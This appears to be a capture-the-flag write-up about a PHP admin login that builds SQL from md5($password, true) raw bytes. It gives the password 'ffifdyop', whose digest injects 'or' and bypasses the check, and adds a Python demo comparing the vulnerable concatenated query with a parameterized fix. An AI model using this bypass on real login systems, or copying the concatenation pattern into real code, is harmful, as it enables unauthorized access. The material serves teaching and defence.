<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body style="background-color: #999">
<div style="position:relative;margin:0 auto;width:300px;height:200px;padding-top:100px;font-size:20px;">
<form action="" method="post">
<table>
<tr>
请用管理员密码进行登录~~
</tr>
<tr>
<td>密码:</td><td><input type="text" name='password'></td>
</tr>
<tr>
<td><input type="submit" name='submit' style="margin-left:30px;"></td>
</tr>
</table>
</form>
密码错误! </div>
<!-- $password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
$result=mysqli_query($link,$sql);
if(mysqli_num_rows($result)>0){
echo 'flag is :'.$flag;
}
else{
echo '密码错误!';
}  -->
</body>
</html>
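The source is shown above. Because md5($password,true) returns the raw 16-byte digest instead of a hex string, the question is which password hashes to bytes that contain a string such as 'or':
$sql="select password from users where password=''or'<xxx>'"
A ready-made string: ffifdyop
Its MD5 is 276f722736c95d99e921722cf9ed621c
Converted back to a string, that is: 'or'6<other characters>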
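
The query from the source above next to a hardened form, as an added example that is not part of the original page or the challenge's code. It assumes Python's sqlite3 as a stand-in for the MySQL backend and a constructed admin password; the function names are hypothetical.

```python
import hashlib
import sqlite3

# Constructed sample value; sqlite3 stands in for the page's MySQL backend (assumption).
STORED_PASSWORD = "constructed-admin-password"


def make_db():
    """In-memory admin table holding the hex MD5 of the constructed password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', ?)",
               (hashlib.md5(STORED_PASSWORD.encode()).hexdigest(),))
    return db


def raw_md5_text(password):
    """Counterpart of PHP md5($password, true): the 16 raw digest bytes as text."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def login_concatenated(db, password):
    """Same shape as the page's query: raw digest bytes become part of the SQL text."""
    sql = ("SELECT * FROM admin WHERE username = 'admin' and password = '"
           + raw_md5_text(password) + "'")
    try:
        return len(db.execute(sql).fetchall()) > 0
    except (sqlite3.Error, ValueError):
        return False  # the digest bytes produced invalid SQL


def login_parameterized(db, password):
    """Hardened form: hex digest, bound as a parameter so it is never parsed as SQL.
    MD5 is kept only to mirror the page; a salted password hash is the better choice."""
    digest = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT 1 FROM admin WHERE username = 'admin' AND password = ?",
        (digest,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for pw in ("ffifdyop", STORED_PASSWORD):
        print(pw, login_concatenated(db, pw), login_parameterized(db, pw))
```

With the concatenated query the digest of ffifdyop closes the string literal and the remaining bytes are parsed as `or '6...'`, which the database evaluates as true; with the bound parameter the same input is only ever compared as data.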